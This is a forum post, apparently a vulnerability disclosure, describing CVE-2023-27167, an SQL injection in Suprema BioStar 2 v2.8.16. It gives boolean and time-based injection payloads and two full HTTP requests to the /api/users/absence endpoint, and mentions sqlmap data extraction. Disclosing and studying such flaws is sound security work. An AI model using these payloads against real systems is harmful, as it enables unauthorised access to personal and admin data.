What's new

Article CVE-2023-27167 - Suprema BioStar 2 v2.8.16 - SQL Injection

Vander 0

Vander

Staff member
Nov 10, 2019
468
1,158
1679828133170.png

I have discovered a vulnerability in Suprema's product - BioStar 2 v2.8.16. This vulnerability is classified as SQL Injection. At my request, MITRE assigned this vulnerability - CVE-2023-27167.

Below I provide detailed information about this vulnerability and a security advisory.

The developer of this product, Suprema, has confirmed the vulnerability, released an updated version, and gave permission for the publication of this information.

CVE-2023-27167 - Suprema BioStar 2 v2.8.16 - SQL Injection.

Vendor of Product:
  • Suprema
Vulnerability Type:
  • SQL Injection
Affected Product Code Base:
  • Suprema BioStar 2 - <= 2.8.16 Affected Versions
Affected Component:
Attack Type:
  • Remote
Attack Vectors:
  • A potential attacker with remote web access to the Suprema BioStar 2 system with minimal privileges can craft a special web request, which in turn will lead to the injection of a SQL query into the database of this application. This will result in the disclosure of confidential information.
Description:
  • The "values" JSON parameter appears to be vulnerable to SQL injection attacks. The payloads "and 3523=03523" and "and 3546=03546" were each submitted in the "values" JSON parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
  • Additionally, the payload "(select*from(select(sleep(11)))a)" was submitted in the "values" JSON parameter. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay. The database appears to be MySQL.
Evidence:
  • Examples of vulnerable requests and parameters:
    • POST /api/users/absence?search_month=1 HTTP/1.1
    • Host: biostar2.server.net
      • Vulnerable parameter "values" (example):
        • {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}
Examples of vulnerable request:

#1

Code:
POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 204
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}}
#2

Code:
POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 188
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}
1679831150710.png

Screenshot that shows Time based SQL injection (set 4 – response delays for 8 seconds)

1679831400756.png

Screenshot that shows Time based SQL injection (set 13 – response delays for 26 seconds)

1679831543365.png

Screenshot that shows Boolean-based SQL injection (payload “1 and 9458=09458” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin)

1679831829397.png

Screenshot that shows Boolean-based SQL injection (payload “1 and 9458=09453” means “1 and False”, so information, regarding user with id 1, which is admin, is absent in response)

1679831960151.png

Screenshot that shows example of exploitation (extracting data from DB) using sqlmap tool.

1679835322655.png

Screenshot that shows example of exploitation (extracting data from DB) using sqlmap tool.

1679835382318.png

Screenshot that shows example of exploitation (extracting data from DB) using sqlmap tool.​

Security Recommendations:
Thank you for your attention. The material was prepared specifically for protey.net
 
Last edited:
id2746 0

id2746

Advanced
Dec 17, 2019
25
50
Ура, наконец форум поднялся, это хорошие новости!
 
Top Bottom